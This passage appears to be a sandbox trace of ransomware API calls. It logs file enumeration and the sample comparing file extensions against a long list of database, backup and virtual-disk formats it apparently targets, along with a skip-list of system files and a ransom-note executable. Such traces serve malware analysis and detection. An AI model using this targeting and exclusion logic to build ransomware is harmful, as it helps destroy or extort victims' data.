lpString2="sql") returned -1 [0039.760] lstrlenW (lpString="sqlite") returned 6 [0039.760] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0039.760] lstrlenW (lpString="sqlite3") returned 7 [0039.761] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0039.761] lstrlenW (lpString="sqlitedb") returned 8 [0039.761] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0039.761] lstrlenW (lpString="xml") returned 3 [0039.761] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0039.761] lstrlenW (lpString="$er") returned 3 [0039.761] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0039.761] lstrlenW (lpString="4dd") returned 3 [0039.761] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0039.761] lstrlenW (lpString="4dl") returned 3 [0039.761] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0039.761] lstrlenW (lpString="^^^") returned 3 [0039.761] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.761] lstrlenW (lpString="abs") returned 3 [0039.761] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.761] lstrlenW (lpString="abx") returned 3 [0039.761] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.761] lstrlenW (lpString="accdb") returned 5 [0039.761] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.761] lstrlenW (lpString="accdc") returned 5 [0039.761] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.761] lstrlenW (lpString="accde") returned 5 [0039.761] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.761] lstrlenW (lpString="accdr") returned 5 [0039.761] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.761] lstrlenW (lpString="accdt") returned 5 [0039.761] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.761] lstrlenW (lpString="accdw") returned 5 [0039.761] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.761] lstrlenW (lpString="accft") returned 5 [0039.761] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.761] lstrlenW (lpString="adb") returned 3 [0039.761] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.762] lstrlenW (lpString="adb") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.762] lstrlenW (lpString="ade") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.762] lstrlenW (lpString="adf") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.762] lstrlenW (lpString="adn") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.762] lstrlenW (lpString="adp") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.762] lstrlenW (lpString="alf") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.762] lstrlenW (lpString="ask") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.762] lstrlenW (lpString="btr") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.762] lstrlenW (lpString="cat") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.762] lstrlenW (lpString="cdb") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.762] lstrlenW (lpString="ckp") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.762] lstrlenW (lpString="cma") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.762] lstrlenW (lpString="cpd") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.762] lstrlenW (lpString="dacpac") returned 6 [0039.762] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.762] lstrlenW (lpString="dad") returned 3 [0039.762] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.762] lstrlenW (lpString="dadiagrams") returned 10 [0039.762] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.762] lstrlenW (lpString="daschema") returned 8 [0039.763] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.763] lstrlenW (lpString="db-journal") returned 10 [0039.763] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.763] lstrlenW (lpString="db-shm") returned 6 [0039.763] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.763] lstrlenW (lpString="db-wal") returned 6 [0039.763] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0039.763] lstrlenW (lpString="dbc") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.763] lstrlenW (lpString="dbs") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.763] lstrlenW (lpString="dbt") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.763] lstrlenW (lpString="dbv") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.763] lstrlenW (lpString="dbx") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.763] lstrlenW (lpString="dcb") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.763] lstrlenW (lpString="dct") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.763] lstrlenW (lpString="dcx") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.763] lstrlenW (lpString="ddl") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.763] lstrlenW (lpString="dlis") returned 4 [0039.763] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.763] lstrlenW (lpString="dp1") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.763] lstrlenW (lpString="dqy") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.763] lstrlenW (lpString="dsk") returned 3 [0039.763] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.764] lstrlenW (lpString="dsn") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.764] lstrlenW (lpString="dtsx") returned 4 [0039.764] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.764] lstrlenW (lpString="dxl") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.764] lstrlenW (lpString="eco") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.764] lstrlenW (lpString="ecx") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.764] lstrlenW (lpString="edb") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.764] lstrlenW (lpString="epim") returned 4 [0039.764] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.764] lstrlenW (lpString="fcd") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.764] lstrlenW (lpString="fdb") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.764] lstrlenW (lpString="fic") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.764] lstrlenW (lpString="flexolibrary") returned 12 [0039.764] lstrlenW (lpString="fm5") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.764] lstrlenW (lpString="fmp") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.764] lstrlenW (lpString="fmp12") returned 5 [0039.764] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.764] lstrlenW (lpString="fmpsl") returned 5 [0039.764] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.764] lstrlenW (lpString="fol") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.764] lstrlenW (lpString="fp3") returned 3 [0039.764] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.765] lstrlenW (lpString="fp4") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.765] lstrlenW (lpString="fp5") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.765] lstrlenW (lpString="fp7") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.765] lstrlenW (lpString="fpt") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.765] lstrlenW (lpString="frm") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.765] lstrlenW (lpString="gdb") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.765] lstrlenW (lpString="gdb") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.765] lstrlenW (lpString="grdb") returned 4 [0039.765] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.765] lstrlenW (lpString="gwi") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.765] lstrlenW (lpString="hdb") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.765] lstrlenW (lpString="his") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.765] lstrlenW (lpString="ib") returned 2 [0039.765] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.765] lstrlenW (lpString="idb") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.765] lstrlenW (lpString="ihx") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.765] lstrlenW (lpString="itdb") returned 4 [0039.765] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.765] lstrlenW (lpString="itw") returned 3 [0039.765] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.765] lstrlenW (lpString="jet") returned 3 [0039.766] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.766] lstrlenW (lpString="jtx") returned 3 [0039.766] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.766] lstrlenW (lpString="kdb") returned 3 [0039.766] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.766] lstrlenW (lpString="kexi") returned 4 [0039.766] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.766] lstrlenW (lpString="kexic") returned 5 [0039.766] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.766] lstrlenW (lpString="kexis") returned 5 [0039.766] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.766] lstrlenW (lpString="lgc") returned 3 [0039.766] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.766] lstrlenW (lpString="lwx") returned 3 [0039.766] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.766] lstrlenW (lpString="maf") returned 3 [0039.766] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.766] lstrlenW (lpString="maq") returned 3 [0039.766] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.766] lstrlenW (lpString="mar") returned 3 [0039.766] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.766] lstrlenW (lpString="marshal") returned 7 [0039.766] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.766] lstrlenW (lpString="mas") returned 3 [0039.766] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.766] lstrlenW (lpString="mav") returned 3 [0039.766] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.766] lstrlenW (lpString="maw") returned 3 [0039.766] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.766] lstrlenW (lpString="mdbhtml") returned 7 [0039.766] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.766] lstrlenW (lpString="mdn") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.767] lstrlenW (lpString="mdt") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.767] lstrlenW (lpString="mfd") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.767] lstrlenW (lpString="mpd") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.767] lstrlenW (lpString="mrg") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.767] lstrlenW (lpString="mud") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.767] lstrlenW (lpString="mwb") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.767] lstrlenW (lpString="myd") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.767] lstrlenW (lpString="ndf") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.767] lstrlenW (lpString="nnt") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.767] lstrlenW (lpString="nrmlib") returned 6 [0039.767] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.767] lstrlenW (lpString="ns2") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.767] lstrlenW (lpString="ns3") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.767] lstrlenW (lpString="ns4") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.767] lstrlenW (lpString="nsf") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.767] lstrlenW (lpString="nv") returned 2 [0039.767] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.767] lstrlenW (lpString="nv2") returned 3 [0039.767] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.768] lstrlenW (lpString="nwdb") returned 4 [0039.768] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.768] lstrlenW (lpString="nyf") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.768] lstrlenW (lpString="odb") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.768] lstrlenW (lpString="odb") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.768] lstrlenW (lpString="oqy") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.768] lstrlenW (lpString="ora") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.768] lstrlenW (lpString="orx") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.768] lstrlenW (lpString="owc") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.768] lstrlenW (lpString="p96") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.768] lstrlenW (lpString="p97") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.768] lstrlenW (lpString="pan") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.768] lstrlenW (lpString="pdb") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.768] lstrlenW (lpString="pdm") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.768] lstrlenW (lpString="pnz") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.768] lstrlenW (lpString="qry") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.768] lstrlenW (lpString="qvd") returned 3 [0039.768] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.768] lstrlenW (lpString="rbf") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.769] lstrlenW (lpString="rctd") returned 4 [0039.769] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.769] lstrlenW (lpString="rod") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0039.769] lstrlenW (lpString="rodx") returned 4 [0039.769] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.769] lstrlenW (lpString="rpd") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.769] lstrlenW (lpString="rsd") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.769] lstrlenW (lpString="sas7bdat") returned 8 [0039.769] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.769] lstrlenW (lpString="sbf") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.769] lstrlenW (lpString="scx") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.769] lstrlenW (lpString="sdb") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.769] lstrlenW (lpString="sdc") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.769] lstrlenW (lpString="sdf") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.769] lstrlenW (lpString="sis") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.769] lstrlenW (lpString="spq") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.769] lstrlenW (lpString="te") returned 2 [0039.769] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.769] lstrlenW (lpString="teacher") returned 7 [0039.769] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.769] lstrlenW (lpString="tmd") returned 3 [0039.769] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.770] lstrlenW (lpString="tps") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.770] lstrlenW (lpString="trc") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.770] lstrlenW (lpString="trc") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.770] lstrlenW (lpString="trm") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.770] lstrlenW (lpString="udb") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.770] lstrlenW (lpString="udl") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.770] lstrlenW (lpString="usr") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.770] lstrlenW (lpString="v12") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.770] lstrlenW (lpString="vis") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.770] lstrlenW (lpString="vpd") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.770] lstrlenW (lpString="vvv") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.770] lstrlenW (lpString="wdb") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0039.770] lstrlenW (lpString="wmdb") returned 4 [0039.770] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.770] lstrlenW (lpString="wrk") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.770] lstrlenW (lpString="xdb") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.770] lstrlenW (lpString="xld") returned 3 [0039.770] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.770] lstrlenW (lpString="xmlff") returned 5 [0039.771] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.771] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49569760, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49569760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.771] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.771] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="aoldtz.exe") returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2=".") returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="..") returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="windows") returned -1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="bootmgr") returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="temp") returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="pagefile.sys") returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="boot") returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="ids.txt") returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="ntuser.dat") returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="perflogs") returned 1 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2="MSBuild") returned 1 [0039.771] lstrlenW (lpString="Wildlife.wmv") returned 12 [0039.771] lstrlenW (lpString="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 48 [0039.771] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="Wildlife.wmv" | out: lpString1="Wildlife.wmv") returned="Wildlife.wmv" [0039.771] lstrlenW (lpString="Wildlife.wmv") returned 12 [0039.771] lstrlenW (lpString="Ares865") returned 7 [0039.771] lstrcmpiW (lpString1="ife.wmv", lpString2="Ares865") returned 1 [0039.771] lstrlenW (lpString=".dll") returned 4 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2=".dll") returned 1 [0039.771] lstrlenW (lpString=".lnk") returned 4 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2=".lnk") returned 1 [0039.771] lstrlenW (lpString=".ini") returned 4 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2=".ini") returned 1 [0039.771] lstrlenW (lpString=".sys") returned 4 [0039.771] lstrcmpiW (lpString1="Wildlife.wmv", lpString2=".sys") returned 1 [0039.771] lstrlenW (lpString="Wildlife.wmv") returned 12 [0039.772] lstrlenW (lpString="bak") returned 3 [0039.772] lstrcmpiW (lpString1="wmv", lpString2="bak") returned 1 [0039.772] lstrlenW (lpString="ba_") returned 3 [0039.772] lstrcmpiW (lpString1="wmv", lpString2="ba_") returned 1 [0039.772] lstrlenW (lpString="dbb") returned 3 [0039.772] lstrcmpiW (lpString1="wmv", lpString2="dbb") returned 1 [0039.772] lstrlenW (lpString="vmdk") returned 4 [0039.772] lstrcmpiW (lpString1=".wmv", lpString2="vmdk") returned -1 [0039.772] lstrlenW (lpString="rar") returned 3 [0039.772] lstrcmpiW (lpString1="wmv", lpString2="rar") returned 1 [0039.772] lstrlenW (lpString="zip") returned 3 [0039.772] lstrcmpiW (lpString1="wmv", lpString2="zip") returned -1 [0039.772] lstrlenW (lpString="tgz") returned 3 [0039.772] lstrcmpiW (lpString1="wmv", lpString2="tgz") returned 1 [0039.772] lstrlenW (lpString="vbox") returned 4 [0039.772] lstrcmpiW (lpString1=".wmv", lpString2="vbox") returned -1 [0039.772] lstrlenW (lpString="vdi") returned 3 [0039.772] lstrcmpiW (lpString1="wmv", lpString2="vdi") returned 1 [0039.772] lstrlenW (lpString="vhd") returned 3 [0039.772] lstrcmpiW (lpString1="wmv", lpString2="vhd") returned 1 [0039.772] lstrlenW (lpString="vhdx") returned 4 [0039.772] lstrcmpiW (lpString1=".wmv", lpString2="vhdx") returned -1 [0039.772] lstrlenW (lpString="avhd") returned 4 [0039.772] lstrcmpiW (lpString1=".wmv", lpString2="avhd") returned -1 [0039.772] lstrlenW (lpString="db") returned 2 [0039.772] lstrcmpiW (lpString1="mv", lpString2="db") returned 1 [0039.772] lstrlenW (lpString="db2") returned 3 [0039.772] lstrcmpiW (lpString1="wmv", lpString2="db2") returned 1 [0039.772] lstrlenW (lpString="db3") returned 3 [0039.772] lstrcmpiW (lpString1="wmv", lpString2="db3") returned 1 [0039.772] lstrlenW (lpString="dbf") returned 3 [0039.772] lstrcmpiW (lpString1="wmv", lpString2="dbf") returned 1 [0039.773] lstrlenW (lpString="mdf") returned 3 [0039.773] lstrcmpiW (lpString1="wmv", lpString2="mdf") returned 1 [0039.773] lstrlenW (lpString="mdb") returned 3 [0039.773] lstrcmpiW (lpString1="wmv", lpString2="mdb") returned 1 [0039.773] lstrlenW (lpString="sql") returned 3 [0039.773] lstrcmpiW (lpString1="wmv", lpString2="sql") returned 1 [0039.773] lstrlenW (lpString="sqlite") returned 6 [0039.773] lstrcmpiW (lpString1="fe.wmv", lpString2="sqlite") returned -1 [0039.773] lstrlenW (lpString="sqlite3") returned 7 [0039.773] lstrcmpiW (lpString1="ife.wmv", lpString2="sqlite3") returned -1 [0039.773] lstrlenW (lpString="sqlitedb") returned 8 [0039.773] lstrcmpiW (lpString1="life.wmv", lpString2="sqlitedb") returned -1 [0039.773] lstrlenW (lpString="xml") returned 3 [0039.773] lstrcmpiW (lpString1="wmv", lpString2="xml") returned -1 [0039.773] lstrlenW (lpString="$er") returned 3 [0039.773] lstrcmpiW (lpString1="wmv", lpString2="$er") returned 1 [0039.773] lstrlenW (lpString="4dd") returned 3 [0039.773] lstrcmpiW (lpString1="wmv", lpString2="4dd") returned 1 [0039.773] lstrlenW (lpString="4dl") returned 3 [0039.773] lstrcmpiW (lpString1="wmv", lpString2="4dl") returned 1 [0039.773] lstrlenW (lpString="^^^") returned 3 [0039.773] lstrcmpiW (lpString1="wmv", lpString2="^^^") returned 1 [0039.773] lstrlenW (lpString="abs") returned 3 [0039.773] lstrcmpiW (lpString1="wmv", lpString2="abs") returned 1 [0039.773] lstrlenW (lpString="abx") returned 3 [0039.773] lstrcmpiW (lpString1="wmv", lpString2="abx") returned 1 [0039.773] lstrlenW (lpString="accdb") returned 5 [0039.773] lstrcmpiW (lpString1="e.wmv", lpString2="accdb") returned 1 [0039.773] lstrlenW (lpString="accdc") returned 5 [0039.773] lstrcmpiW (lpString1="e.wmv", lpString2="accdc") returned 1 [0039.773] lstrlenW (lpString="accde") returned 5 [0039.773] lstrcmpiW (lpString1="e.wmv", lpString2="accde") returned 1 [0039.773] lstrlenW (lpString="accdr") returned 5 [0039.774] lstrcmpiW (lpString1="e.wmv", lpString2="accdr") returned 1 [0039.774] lstrlenW (lpString="accdt") returned 5 [0039.774] lstrcmpiW (lpString1="e.wmv", lpString2="accdt") returned 1 [0039.774] lstrlenW (lpString="accdw") returned 5 [0039.774] lstrcmpiW (lpString1="e.wmv", lpString2="accdw") returned 1 [0039.774] lstrlenW (lpString="accft") returned 5 [0039.774] lstrcmpiW (lpString1="e.wmv", lpString2="accft") returned 1 [0039.774] lstrlenW (lpString="adb") returned 3 [0039.774] lstrcmpiW (lpString1="wmv", lpString2="adb") returned 1 [0039.774] lstrlenW (lpString="adb") returned 3 [0039.774] lstrcmpiW (lpString1="wmv", lpString2="adb") returned 1 [0039.774] lstrlenW (lpString="ade") returned 3 [0039.774] lstrcmpiW (lpString1="wmv", lpString2="ade") returned 1 [0039.774] lstrlenW (lpString="adf") returned 3 [0039.774] lstrcmpiW (lpString1="wmv", lpString2="adf") returned 1 [0039.774] lstrlenW (lpString="adn") returned 3 